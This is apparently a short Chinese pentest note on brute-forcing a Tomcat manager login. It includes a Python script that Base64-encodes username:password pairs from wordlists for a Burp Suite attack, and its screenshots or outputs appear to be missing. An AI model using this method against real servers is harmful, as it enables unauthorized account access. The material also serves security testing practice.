情况说明:
输入账户和密码后,抓包:
可以看到认证那里是base64编码过的,解码得到:
构建爆破内容
- 前期已经得到的tomcat常用的账户名和密码字典:
- 编写脚本构造爆破所需的内容:
import base64
f=open("com.txt","a")
for user1 in open("user"):
for pass1 in open("pass"):
combine = user1 + ":" + pass1 # 结合后的字符串
base64d = base64.b64encode(combine.encode("utf-8")) # base64编码
base64d = base64d.decode("utf-8") # 去掉“d”
print(base64d)
f.write("{}\n".format(base64d)) # 输出到新的文件里
输出的结果为:
3. 最后一步,在burp里爆破